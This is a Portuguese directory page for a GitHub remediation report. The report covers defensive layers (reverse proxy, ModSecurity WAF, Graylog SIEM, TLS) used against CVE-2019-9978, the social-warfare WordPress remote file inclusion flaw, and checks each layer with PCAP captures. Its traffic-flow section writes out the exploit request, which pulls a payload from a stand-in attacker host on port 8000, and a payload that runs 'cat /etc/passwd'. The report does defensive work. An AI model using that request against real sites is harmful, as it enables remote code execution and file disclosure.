Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Vuln_Remediation_MegaQuagga — Relatório de remediação para MegaQuagga Publishing validando a mitigação da CVE-2019-9978 por meio de camadas defensivas progressivas. Documenta a inserção de proxy reverso, a implantação do WAF ModSecurity, a integração com Graylog SIEM e a aplicação de SSL/TLS usando análise multiestágio de PCAP do Wireshark nas interfaces WAN e LAN do pfSense. | Kitploit
Ferramentas/GitHubGitHub/b4ntgrim/vuln_remediation_megaquagga
Ferramentas DefensivasAnálise de VulnerabilidadesSegurança WebSegurança de RedeAprendizado e EducaçãoResposta a IncidentesAnálise de Logs
GitHubb4ntgrim/vuln_remediation_megaquagga

Vuln_Remediation_MegaQuagga

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
3há 4 mesesAinda não revisado

Sobre

Relatório de remediação para MegaQuagga Publishing validando a mitigação da CVE-2019-9978 por meio de camadas defensivas progressivas. Documenta a inserção de proxy reverso, a implantação do WAF ModSecurity, a integração com Graylog SIEM e a aplicação de SSL/TLS usando análise multiestágio de PCAP do Wireshark nas interfaces WAN e LAN do pfSense.

Compartilhar

Vuln_Remediation_MegaQuagga

Relatório de remediação para a MegaQuagga Publishing, validando a mitigação da CVE-2019-9978 através de camadas defensivas progressivas. Documenta a inserção de proxy reverso, implantação de ModSecurity WAF, integração com Graylog SIEM e imposição de SSL/TLS usando análise PCAP multi-estágio com Wireshark nas interfaces WAN e LAN do pfSense.

Remediação de Vulnerabilidade — Relatório de Remediação da MegaQuagga

Analista: Samuel Weiss Organização: 0x2A Security Versão: 1.1 (27 de abril de 2026) Cliente: MegaQuagga Publishing Classificação: CONFIDENCIAL


Visão Geral

Este projeto documenta a remediação ativa das vulnerabilidades identificadas durante o teste de penetração da MegaQuagga, com foco particular na CVE-2019-9978 (Inclusão Remota de Arquivos via o plugin WordPress social-warfare). A remediação foi validada por meio de análise de captura de pacotes multi-estágio com Wireshark nas interfaces WAN e LAN do pfSense, com controles defensivos progressivos aplicados e testados novamente em cada estágio.


Arquivos

ArquivoDescrição
_VULN_REMEDIATION__MegaQuagga_Remediation_Report__Samuel_Weiss_.docxRelatório completo de remediação, incluindo resumo executivo, ações tomadas, evidências baseadas em PCAP da remediação e recomendações futuras
_VULN_REMEDIATION__PCAP_worksheet__Samuel_Weiss_.xlsxPlanilha de análise PCAP documentando arquivos de captura de pacotes, fluxo de tráfego em cada estágio de remediação, IPs de origem/destino, portas e anotações de fluxo TCP

Escopo

  • Vulnerabilidade Tratada: CVE-2019-9978 — Inclusão Remota de Arquivos (RFI) via plugin WordPress social-warfare
  • Ambiente: Servidor WordPress da MegaQuagga Publishing com firewall pfSense
  • Abordagem: Camadas defensivas progressivas com reexecução do exploit após cada controle para validar a eficácia

Ações de Remediação Realizadas

1. Inserção de Proxy Reverso

Um proxy reverso foi implantado na frente do servidor web WordPress, alterando a arquitetura de rede de modo que o tráfego direto para o servidor de aplicação backend não fosse mais possível a partir da rede externa. A evidência do PCAP confirmou o roteamento do tráfego através da camada de proxy.

2. Firewall de Aplicação Web (WAF) — ModSecurity

O ModSecurity foi ativado como camada de WAF no proxy reverso. Após a reexecução do exploit RFI, o payload malicioso swp_url foi bloqueado e o servidor retornou HTTP 403 Forbidden, confirmando que a regra do WAF estava sendo acionada pela assinatura do exploit. A atividade de alerta foi confirmada no Graylog SIEM.

3. Integração com SIEM — Graylog

O Graylog foi configurado para fornecer agregação centralizada de logs e monitoramento de alertas. Regras de alerta do ModSecurity foram implantadas para detectar assinaturas de exploit RFI, proporcionando visibilidade em tempo real de tentativas de ataque.

4. Imposição de SSL/TLS e Fortalecimento do Firewall

  • Um certificado SSL válido foi implantado no proxy reverso com offloading SSL configurado
  • As regras de firewall WAN do pfSense foram atualizadas para permitir apenas HTTPS na porta 443
  • As regras de NAT foram atualizadas para refletir a nova política de ingresso
  • Após novo teste, o payload RFI foi bloqueado e não conseguiu penetrar no ambiente

Registro de Captura PCAP

ArquivoDataInterfaceFiltroPacotesEstágio
Red-Team-1.pcapng2025-01-03eth0 (Red-Team)nenhum4.013Linha de base pré-remediação
Red-Team-2.pcapng2026-04-22eth0 (Red-Team)nenhum26.841Pré-remediação (exploit confirmado)
pfSense-WAN-1.pcap2026-04-22em0 (WAN)192.168.100.x46Tráfego do exploit capturado no lado WAN
pfSense-LAN-1.pcap2026-04-23em1 (LAN)192.168.100.x39Tráfego do exploit no lado LAN (pré-proxy)
pfSense-LAN-2.pcap2026-04-23em1 (LAN)porta 80/800045Após inserção de proxy reverso
pfSense-LAN-3.pcap2026-04-24em1 (LAN)porta 80/8000/4431.000Após WAF ativado (403 Forbidden confirmado)
pfSense-LAN-4.pcap2026-04-25em1 (LAN)porta 81/8000/443534Após offloading SSL (exploit bloqueado)

Fluxo de Tráfego do Exploit — Análise Chave de Pacotes

Pré-Remediação (Red-Team-1 / pfSense-LAN-1)

root@kitploit:~
[Atacante] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[atacante]:8000/payload.txt
[WordPress] → GET /payload.txt (busca payload PHP hospedado pelo atacante)
[Atacante]  → Retorna: <pre>system('cat /etc/passwd')</pre>
[WordPress] → Retorna conteúdo de /etc/passwd para o atacante ✅ EXPLOIT BEM-SUCEDIDO

Após WAF (pfSense-LAN-3)

root@kitploit:~
[Atacante] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=...
[WAF]       → HTTP 403 Forbidden ✅ EXPLOIT BLOQUEADO

Após Imposição de SSL (pfSense-LAN-4)

root@kitploit:~
[Atacante] → Apenas HTTPS; porta HTTP 80 bloqueada no pfSense WAN
[pfSense]  → Payload do exploit não consegue alcançar o servidor web ✅ EXPLOIT BLOQUEADO

Recomendações Futuras

  1. Manter Plugins Atualizados e Auditados — Atualizar social-warfare para v3.5.3+; remover plugins inativos para reduzir superfície de ataque
  2. Manter Regras de Firewall — Revisar regras do pfSense periodicamente; manter porta 80 bloqueada ou redirecionada para HTTPS
  3. Monitorar Alertas do SIEM Continuamente — Revisar e atualizar regras de alerta do Graylog regularmente; atribuir alertas a um responsável para resposta oportuna
  4. Realizar Varreduras Regulares de Vulnerabilidades — Agendar varreduras de rotina no servidor WordPress e infraestrutura circundante; remediar com base em prazos por severidade
  5. Aplicar Menor Privilégio — Restringir processos do servidor web e contas de usuário do WordPress às permissões mínimas necessárias

Descrição do GitHub

Relatório de remediação para a MegaQuagga Publishing, validando a mitigação da CVE-2019-9978 através de camadas defensivas progressivas. Documenta a inserção de proxy reverso, implantação de ModSecurity WAF, integração com Graylog SIEM e imposição de SSL/TLS usando análise PCAP multi-estágio com Wireshark nas interfaces WAN e LAN do pfSense.

Baixar ferramenta